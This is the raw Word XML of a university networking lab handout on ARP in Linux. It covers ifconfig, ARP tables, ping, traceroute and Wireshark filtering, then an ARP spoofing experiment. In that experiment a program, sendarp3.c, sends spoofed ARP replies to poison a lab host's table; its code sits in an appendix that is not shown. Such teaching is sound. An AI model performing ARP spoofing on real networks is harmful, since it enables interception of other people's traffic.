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04" w:rsidRPr="00B20DA5" w:rsidRDefault="002354E5" w:rsidP="00AD3004">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>07</w:t>
      </w:r>
      <w:r w:rsidR="00AD3004">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00AD3004">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared by Alexander </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chefranov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00861DDF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, Updated by Ali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00861DDF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Farrokhnejad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00861DDF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (0</w:t>
      </w:r>
      <w:r w:rsidR="00C167E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00861DDF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.05.2025)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRPr="00BE55C0" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE55C0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CMPE455 Lab </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00BE55C0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BE55C0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ARP  in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BE55C0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B112D" w:rsidRDefault="00AD3004" w:rsidP="008B112D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You will conduct a series of Experiments 1-9, on two computers per group, according to the screenshots and explanations provided below. </w:t>
      </w:r>
      <w:r w:rsidR="00982539">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You should create a report based on the experiment</w:t>
      </w:r>
      <w:r w:rsidR="006B229C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> examples below</w:t>
      </w:r>
      <w:r w:rsidR="00982539">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, showing your results and answering the questions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRPr="00440F29" w:rsidRDefault="00AD3004" w:rsidP="002354E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For</w:t>
      </w:r>
      <w:r w:rsidRPr="00440F29">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Experiment 9, fill in Ethernet and ARP frames for ARP request and ARP reply </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="008B112D" w:rsidP="004B3F24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Write your report based on the template provided to you on Teams</w:t>
      </w:r>
      <w:r w:rsidR="00AD3004">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and submit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">it via </w:t>
      </w:r>
      <w:r w:rsidR="00460DFF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00AD3004">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Teams assignment </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>until</w:t>
      </w:r>
      <w:r w:rsidR="00AD3004">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00927E53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>May, 22</w:t>
      </w:r>
      <w:r w:rsidR="004B3F24">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, 2025, Thursday</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRPr="00A92244" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRPr="00A0356A" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A0356A">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Grading policy: 100% for report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Experiments 1-9 are specified below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC1A05">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC1A05">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="he-IL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DD1EA46" wp14:editId="39154F27">
            <wp:extent cx="5760720" cy="35756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config_arp_125_240420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04" w:rsidRPr="003A46FC" w:rsidRDefault="00AD3004" w:rsidP="000B5028">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A46FC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Question: IPv4 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A46FC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and  MAC</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A46FC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> addresses  of your two computers?</w:t>
      </w:r>
      <w:r w:rsidR="001D156A">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB3D6E">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="001D156A">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that these will be used throughout </w:t>
      </w:r>
      <w:r w:rsidR="000B5028">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the experiment</w:t>
      </w:r>
      <w:r w:rsidR="00211D06">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB3D6E">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D6F8F" w:rsidRDefault="007D6F8F" w:rsidP="007D6F8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D6F8F" w:rsidRDefault="007D6F8F" w:rsidP="007D6F8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D6F8F" w:rsidRDefault="007D6F8F" w:rsidP="007D6F8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D6F8F" w:rsidRDefault="007D6F8F" w:rsidP="007D6F8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D6F8F" w:rsidRDefault="007D6F8F" w:rsidP="007D6F8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D6F8F" w:rsidRDefault="007D6F8F" w:rsidP="007D6F8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D6F8F" w:rsidRDefault="007D6F8F" w:rsidP="007D6F8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D6F8F" w:rsidRDefault="007D6F8F" w:rsidP="007D6F8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D6F8F" w:rsidRDefault="007D6F8F" w:rsidP="007D6F8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD30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Arp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="he-IL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="018A6F34" wp14:editId="36D8BDD0">
            <wp:extent cx="5760720" cy="35756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config_arp_125_240420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04" w:rsidRPr="003A46FC" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A46FC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Question: How many hosts are in the table?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD30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Ping </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="he-IL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33F69694" wp14:editId="15FB6BAF">
            <wp:extent cx="5760720" cy="35756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g_arp_125_240420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04" w:rsidRPr="003A46FC" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A46FC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Ping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>two computers, check ARP table again</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B24745" w:rsidRDefault="00B24745" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B24745" w:rsidRDefault="00B24745" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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Traceroute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRPr="007277C7" w:rsidRDefault="00AD3004" w:rsidP="001D156A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="he-IL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="695EC9BA" wp14:editId="746DC467">
            <wp:extent cx="5760720" cy="41001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eroute_125_2404201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04" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD300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Wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Launch: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wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="he-IL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32148979" wp14:editId="58EAA9B8">
            <wp:extent cx="5760720" cy="3253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resharkstart190420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04" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001D156A" w:rsidRDefault="001D156A" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001D156A" w:rsidRDefault="001D156A" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD30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Arp filtering</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In Filter field: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="he-IL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D7DCB9D" wp14:editId="1DF922B9">
            <wp:extent cx="5760720" cy="32531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Preq1904202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04" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B3205" w:rsidRDefault="006B3205" w:rsidP="006B3205">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD30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ARP reply program: sendarp3.c </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6975">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(see Appendix </w:t>
      </w:r>
      <w:r w:rsidR="002D1D23" w:rsidRPr="00EB6975">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00EB6975">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for code</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6975">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB6975" w:rsidRDefault="00EB6975" w:rsidP="00EB6975">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This program is used to perform ARP Spoofing by sending a series of ARP reply packets. More information </w:t>
      </w:r>
      <w:r w:rsidR="00992F85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">can be found </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in the following sections</w:t>
      </w:r>
      <w:r w:rsidR="00992F85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the </w:t>
      </w:r>
      <w:r w:rsidR="00992F85" w:rsidRPr="00992F85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>code with detailed explanations is provided in Appendix 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00992F85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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E1276F" w:rsidRDefault="00E1276F" w:rsidP="00B93060">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD30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ARP spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Generating by sendarp3 ten ARP replies at 192.168.181.125 sent to 192.168.181.132 with MAC address of 192.168.181.126 spoofed as 00:11:22:33:44:55 (program launch and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> output):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRPr="00982539" w:rsidRDefault="00AD3004" w:rsidP="00982539">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="he-IL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79B5E121" wp14:editId="518AAB98">
            <wp:extent cx="5760720" cy="3253330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dARP3_at_125_2404201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04" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ARP replies received on 192.168.181.132 (ARP table is shown before and after ARP replies sending):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="he-IL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FE5C2C1" wp14:editId="3C6D4C77">
            <wp:extent cx="5760720" cy="3253330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P_pois_rest_pois_2404201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04" w:rsidRPr="003A46FC" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A46FC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Question: How ARP spoofing is made? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRPr="00BC1A05" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
